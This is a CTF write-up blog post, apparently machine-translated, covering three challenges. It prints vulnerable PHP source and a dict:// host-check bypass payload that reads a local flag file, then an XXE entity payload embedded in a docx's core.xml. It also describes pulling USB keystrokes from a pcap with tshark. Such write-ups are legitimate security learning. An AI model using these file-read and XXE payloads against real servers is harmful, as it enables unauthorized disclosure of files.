Today, playing a game, I learned a lot of things, write it down and remember.
web2
This question made me a long time, very impressed.
After the start of the file parameters are found to be twice decode a file name. Read index.php file, in <img>view of the. after base64 decoding, as follows:
<?php
error_reporting(E_ALL || ~E_NOTICE);
header('content-type:text/html;charset=utf-8');
if(! isset($_GET['file']))
header('Refresh:0;url=./index.php?file=WTNSbWFXMWhaMlV1YW5Cbg==');
$file = base64_decode(base64_decode($_GET['file']));
echo '<title>'.$_GET['file'].'</title>';
$file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);
echo 'input_filename: '. $file.'</br>';
$file = str_replace("ctf","flag", $file);
echo 'real_filename: '.$file.'</br>';
$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64,".$txt."'></img>";
/*
* Can you find the flag file?
*
* Hint: hal0flagi5here.php
*/
?>
When prompted, read the source code file, as follows:
<?php
$argv[1]=$_GET['url'];
if(filter_var($argv[1],FILTER_VALIDATE_URL))
{
$r = parse_url($argv[1]);
print_r($r);
if(preg_match('/happyctf\.com$/',$r['host']))
{
$url=file_get_contents($argv[1]);
echo($url);
}else
{
echo("error");
}
}else
{
echo "403 Forbidden";
}
?>
Here I am stuck. After Gangster prompted know there is dict://agreement. Then @bypass the host file read test is performed to obtain flag.
payload:?url=dict://@happyctf.com/../../../../../../../flag.txt
web4
Here because I have not seen, so write down the record what, a similar question in this: https://www.jianshu.com/p/40d6d0e7117f
today This question reminds us .bak files downloaded source as follows:
<?php
if(isset($_POST["submit"])) {
$target_file = getcwd()."/upload/".md5($_FILES["file"]["tmp_name"]);
if (move_uploaded_file($_FILES["file"]["tmp_name"], $target_file)) {
try {
$result = @file_get_contents("zip://".$target_file."#docProps/core.xml");
$xml = new SimpleXMLElement($result, LIBXML_NOENT);
$xml->registerXPathNamespace("dc", "http://purl.org/dc/elements/1.1/");
foreach($xml->xpath('//dc:title') as $title){
echo "Title '".$title . "' has been added.<br/>";
}
} catch (Exception $e){
echo $e;
echo "上传文件不是一个docx文档.";
}
} else {
echo "上传失败.";
}
}
?>
doc file is actually a zip file.
It can be seen in core.xml they will read the doc file with zip under the agreement. And the file <dc:title>be read and added directly at. We see it in sample.doc download, modify suffix will be docProps/core.xmlmodified to:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE root[
<!ENTITY xxe SYSTEM "/flag.txt">
]>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<dcterms:created xsi:type="dcterms:W3CDTF">2015-08-01T19:00:00Z</dcterms:created>
<dcterms:modified xsi:type="dcterms:W3CDTF">2015-08-01T19:01:00Z</dcterms:modified>
<dc:title>&xxe;</dc:title>
<cp:revision>1</cp:revision>
</cp:coreProperties>
You can get flag after uploading.
Misc-Keyboard
USB keyboards flow, refer to the following article
https://www.cnblogs.com/hackxf/p/10670844.html
open compressed, and found a u.pcapngfile and encrypted secret.zip file.
With the tshark -r u.pcapng -T fields -e usb.capdata > usbdata.txtcommand, export it to a file usbdata. (Every two numbers separated by a colon normal output will be lower, if not, you need to write a script myself colon).
Reuse Wang Hang Gangster script a run, you can get a string of characters, then use vim shining string to write about in linux you can get password encrypted files. Decryption can be obtained flag.
